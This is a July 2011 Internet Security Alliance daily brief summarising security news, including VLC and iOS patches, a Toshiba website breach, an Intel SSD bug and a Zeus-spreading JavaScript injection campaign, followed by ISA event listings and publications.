Internet Security Alliance Daily Brief (7/19/2011)

In Today's News 

VLC MEDIA PLAYER 1.1.11 CLOSES HEAP OVERFLOW HOLES - H SECURITY, JULY 18

The VideoLAN project announced the release of version 1.1.11 of VLC Media Player. The twelfth release of the 1.1.x branch of VLC is a maintenance and security update that fixes two previously reported heap overflow vulnerabilities in the Real Media and AVI file parsers. Other changes include improvements to the VLC interface on Mac OS X systems and fullscreen fixes for the Win32 Web plug-in, as well as several codec and translation updates. Extensions support and the AVI mixer for converting and transcoding also received fixes. Source: http://www.h-online.com/security/news/item/VLC-Media-Player-1-1-11-closes-heap-overflow-holes-1280716.html

TOSHIBA CONFIRMS LOSS OF CUSTOMER DATA FOLLOWING WEBSITE HACK - SOFTPEDIA, JULY 18

Toshiba confirmed one of its U.S. Web sites was compromised the week of July 11, which led to the loss of user account information. A spokesperson for the consumer electronics company told the Wall Street Journal its U.S. unit observed issues with its Web server July 11 and began investigating. The company confirmed the server was compromised July 13, and user data was stolen. This coincided with a hacker leaking data extracted from the Web site on pastebin. According to Toshiba, the hacked site housed personal information of more than 7,500 customers, but only data belonging to 681 of them was compromised. This is somewhat consistent with what the hacker claimed. He said one database table called "Tbl_Gb_Users" had 5,203 entries, and he eventually leaked about 800 of them. The Toshiba spokesperson stressed no financial data or credit card details were exposed as a result of the breach. Source: http://news.softpedia.com/news/Toshiba-Confirms-Loss-of-User-DataFollowing-Website-Hack-212115.shtml

INTEL INVESTIGATING POSSIBLE BUG IN SSD 320 DRIVES - IDG NEWS SERVICE, JULY 15

Intel said it was investigating a potential bug that may be causing SSD 320 solid-state drives to fail. The company was offering replacement drives to affected customers until the issue is resolved, a customer service representative said. In Intel - 21 - forums, users were complaining about SSD 320 drives crashing due to power issues, causing data loss. In some instances, the storage capacity on the drive was being reported as only 8MB after the crash. An Intel technical support representative said that until the issue is resolved, affected customers will be sent a replacement drive. The SSD 320 was released in March and is being used in PCs and Apple Mac computers. Source: http://www.computerworld.com/s/article/9218463/Intel_investigating_possible_bug_in_SSD_320_drives

NEW MASS INJECTION ATTACK DISTRIBUTES ZEUS - SOFTPEDIA, JULY 15

Security researchers from Sophos warn of a widespread Web injection attack that has infected many Web sites with code distributing a variant of the zeus trojan. "Huge numbers of sites have been injected with a malicious JavaScript that attempts to load content from an exploit site when innocent users browse the affected pages," a principal virus researcher at Sophos said. The injection is widespread with the malicious code, detected by Sophos as Mal/ObfJS-AB, currently representing a quarter of all reported threats. The attack does not seem to be limited to any particular type of Web site or Web server, suggesting the compromise vector might be stolen FTP accounts. Since the purpose of the attack is to distribute a variant of the zeus information-stealing trojan, this theory is even more likely. The injected code redirects visitors to a third-party page that launches PDF and Java exploits. Successful attacks install a zeus variant. "Perhaps the most interesting thing about this attack is the exploit site JavaScript (the content we block as Mal/ExpJS-N). We have been seeing the same exploit script at the end of spam links and JS/Sinowal-V redirects in recent weeks," the Sophos researcher said. "The script is heavily obfuscated and uses polymorphic and anti-emulation techniques to attempt to evade detection." He said affected Web sites span over different hosting providers, so it does not appear that any hosting company is targeted in particular, as seen in some mass injection attacks.  Source: http://news.softpedia.com/news/New-Mass-Injection-Attack-Distributes-ZeuS-211843.shtml

APPLE RELEASES iOS UPDATES TO FIX PDF VULNERABILITIES - MACWORLD, JULY 15

After a report from the German government the week of July 11 regarding PDF-related security vulnerabilities in MobileSafari, Apple released updates for all iOS devices that fix the problem July 15. Though they both fix the same three vulnerabilities, the patch comes in two versions, due to the different versions of the iPhone 4. iOS 4.3.4 applies to the iPad and iPad 2, the third- and fourth-generation iPod touch, the iPhone 3GS, and the iPhone 4 (GSM model); users of the CDMA model of the iPhone 4 instead receive iOS 4.2.9. The issues addressed in the updates include the PDF problem within Apple's CoreGraphics framework, which exploits FreeType's TrueType and Type 1 fonts to execute malicious code, and a conversion problem within the IOMobileFrameBuffer framework, which could allow code to inadvertently gain system privileges by posing as the user. The PDF-related exploits were also being used in the latest jailbreak method for iOS devices, a process that could be accomplished via the jailbreakme.com Web site; Apple's patch reportedly now disables that method. Source: http://www.computerworld.com/s/article/9218449/Apple_releases_iOS_updates_to_fix_PDF_vulnerabilities

Upcoming Events     

 
July 19 at 3:00pm: Protected Health Information Project Finale Subcommittee
The finale subcommittee will facilitate overall integration of the subcommittee input with a view toward producing a coherent final report, and it is led by Rick Kam of ID Experts and Ed Stull of Direct Computer Resources, Inc.

July 19: Securing the eCampus 2011 Conference
Larry Clinton will present, "The Evolution of Cyber Threats and Government Policy" during this conference held at Dartmouth College.

July 20 - Government Innovation Seminar - Engaging the Evolving National Cyber Security Agenda
Larry Clinton will discussing the economics of cyber security and provide a framework for developing a sustainable system of cyber security by indentifying what problems need to be addressed.

 

July 20 at 2:00pm: Protected Health Information Project Ecosystem Subcommittee
The ecosystem subcommittee will define points of compromise in the healthcare ecosystem where there are risks of exposure, and is co-chaired by James Christiansen of Evantix, Gary Gordon of the Center for Identity at the University of Texas at Austin, and Lynda Martel of DriveSavers Data Recovery, Inc.

July 20 at 4:00pm: Protected Health Information Project Legal Subcommittee
The legal subcommittee will identify existing legal protections related to PHI, and is co-chaired by Christine Arevalo of ID Experts, Chris Cwalina and Steve Roosa of Reed Smith, LLP, and  Jim Pyles from Powers Pyles Sutter & Verville, PC.

July 21 at 1:30pm: Protected Health Information Project Survey Subcommittee
The survey subcommittee will query chief security / privacy officers or consumers on what they consider to be sensitive data, and is being led Christine El Eris and Michael Morelli of Affinion Group, Larry Ponemon of the Ponemon Institute, Don Rebovich of the Center for Identity Management and Information Protection at Utica College; and  Andrew Serwin from Foley & Lardner LLP.

July 22 – NSTIC NOI Comments Due to NIST
The White House has launched a Notice of Inquiry (NOI) on the latest draft  to develop the National Strategy for Trusted Identities in Cyberspace.  The Notice of Inquiry (NOI) addresses models for a governance structure for NSTIC.  The comments received on the NOI will help NIST inform their deliberations and decisions on the steering body.  NIST will then produce a public report with recommendations for addressing questions raised on the four key issues outlined in the strategy. 
More more information about this project contact Stephanie Schaffer at sschaffer@isalliance.org.

July 26 from 8:00am-5:00pm: 2011 IT Sector Coordinating Council IT Summer Quarterly meeting

August 2 at 2:00pm - ISA Summer Board Conference Call

September 26 &27: ACI Cyber and Data Risk Insurance
Larry Clinton will discuss the latest federal regulatory developments and enforcement actions and its impact on insurance coverage and litigation.

 Thought Leadership
US House Homeland Security Committee Hearing
ISA President, Larry Clinton has been ask to testify before the  Homeland Security subcommittee on Cybersecurity, Infrastructure Protection and Security Technologies.  The hearing is entitled "Examining the Homeland Security Impact of the Obama Administration's Cybersecurity Proposal. The webcast can be viewed live through the following link: http://homeland.house.gov/hearing/subcommittee-hearing-examining-homeland-security-impact-obamaadministrations-cybersecurity

Summer 2011, Journal of Strategic Security
"A Relationship on the Rocks: Industry-Government Partnership for Cyber Defense" authored by Larry Clinton was published in a recent issue.  To view click here and then select the PDF file next to the article's title.

May 2011, Cutter IT Journal
ISA President Larry Clinton authored the article, "A Theory to Guide US Cyber Security Policy."  To view the article click here, download the issue and go to page 30.

Spring 2012 - Conflict and Cooperation in the Commons
Larry Clinton has authored the chapter "Cyber Security Social Contract".  This book is forthcoming from Georgetown University Press. 

 For more security news visit Infosec Island, an ISA partner organization. Infosec Island is a leading information security portal committed to serving the risk mitigation needs of SMBs, mid-market enterprises, government agencies, legal, financial, healthcare, educational, and nonprofit organizations by providing the latest in news, free network security tools, and insights from leading industry experts. 

Pass the ISA Daily Brief along to your colleagues.  They can create their own subscriptions by contacting mmorgan@isalliance.org